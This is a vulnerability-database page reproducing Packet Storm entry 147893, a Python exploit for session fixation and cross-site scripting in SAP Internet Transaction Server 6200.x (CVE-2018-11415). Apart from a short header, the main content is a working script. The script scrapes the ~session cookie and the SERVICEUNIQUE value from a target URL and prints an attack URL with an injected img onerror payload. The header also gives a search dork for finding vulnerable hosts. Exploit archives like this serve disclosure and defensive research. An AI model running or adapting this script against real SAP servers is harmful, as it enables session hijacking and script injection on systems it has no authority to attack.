Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJ. Carillo LencinaPACKETSTORM:147893
HistoryMay 25, 2018 - 12:00 a.m.

SAP Internet Transaction Server 6200.x Session Fixation / Cross Site Scripting

2018-05-2500:00:00
J. Carillo Lencina
packetstormsecurity.com
22

0.001 Low

EPSS

Percentile

49.0%

JSON
`# Exploit Title: SAP Internet Transaction Server (ITS) 6200.X.X - Session Fixation/ Cross-Site Scripting  
# Dork: /scripts/wgate/  
# Date: 25.05.2018  
# Exploit Author: J. Carrillo Lencina (0xd0m7)  
# Vendor Homepage: https://www.sap.com  
# Version: SAP ITS 6200.X.X  
# Category: Webapps  
# Tested on: All Platforms  
# CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11415  
# Description:As it has been determined that there are two  
vulnerabilities in the latest developed version of SAP ITS, these two  
vulnerabilities added together give rise to an XSS.  
  
#Technical details: It has been determined that when an unauthenticated  
user navigates through the application, the application assigns a cookie,  
that cookie is assigned in the parameter ~ session, therefore it could be  
possible for an attacker to fix the fallo ~ session through a request GET  
This, together with the fact that the parameter SERVICEUNIQUE has a  
parameter validation failure, results in a single-use XSS, since the  
session expires once the method of the request is exchanged and fixed in  
the URL.  
  
#Exploit  
#!/usr/bin/python  
import argparse  
import requests  
import re  
  
parser = argparse.ArgumentParser()  
parser.add_argument("-u", "--url", help="Example: https://example.com/wgate/scripts/ralp/!")  
args = parser.parse_args()  
list=[]  
i=0  
cookie={'s_fid':'3B9C1B379A11790F-00A298287FA44BF5','s_lv':'1524222141316', 's_nr':'1524222141322-New', 's_vnum':'1555758141333%26vn%3D1'}  
url=args.url.split('/')  
url2='https://'+str(url[2])+'/'+str(url[3])+'/'+str(url[4])+'/'  
  
if args.url:  
r = requests.get(args.url,verify=False,cookies=cookie)  
header = r.headers['Set-Cookie']  
cookie_val = header.split(";")  
  
for line in r.iter_lines():  
list.append(line)  
i=i+1  
if line.find('~SERVICEUNIQUE') > 0:  
param = line.replace('"','')  
v = param.split('=')  
val0 = v[3].split(' ')  
print '[+]Random Value:',val0[0]  
  
for line2 in range(len(cookie_val)):  
if cookie_val[line2].find('~session') == 0:  
val1 = cookie_val[line2].split('=')  
print '[+]Session Value:',val1[1]  
print '[+] Vulnerable URL:'+url2+val0[0]+'%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e/?%7ESERVICEUNIQUE='+val0[0]+'%3cimg%20src%3da%20onerror%3dalert(1)%3e&%7Eclientinput=1&%7Elogininput=1&%7Epasswdinput=1&%7Eclient=100&%7Elogin=%3F&%7Epassword=aaaaa&%7EPOV=P&%7EOkCode%3D%2F0=Entrar&~session='+val1[1]  
  
  
else:  
print '[!] Empty URL, please see help (-h,--help)'  
  
`

Related

nvd 1
prion 1
cve 1
exploitpack 1
cvelist 1
exploitdb 1
nvd
nvd
CVE-2018-11415
2018-05-24 19:29:00
prion
prion
Cross site scripting
2018-05-24 19:29:00
cve
cve
CVE-2018-11415
2018-05-24 19:29:00
exploitpack
exploitpack
SAP Internet Transaction Server 6200.x - Session Fixation Cross-Site Scripting
2018-05-25 00:00:00
cvelist
cvelist
CVE-2018-11415
2018-05-24 19:00:00
exploitdb
exploitdb
SAP Internet Transaction Server 6200.x - Session Fixation / Cross-Site Scripting
2018-05-25 00:00:00

0.001 Low

EPSS

Percentile

49.0%

JSON
Related for PACKETSTORM:147893
nvd1prion1cve1exploitpack1cvelist1exploitdb1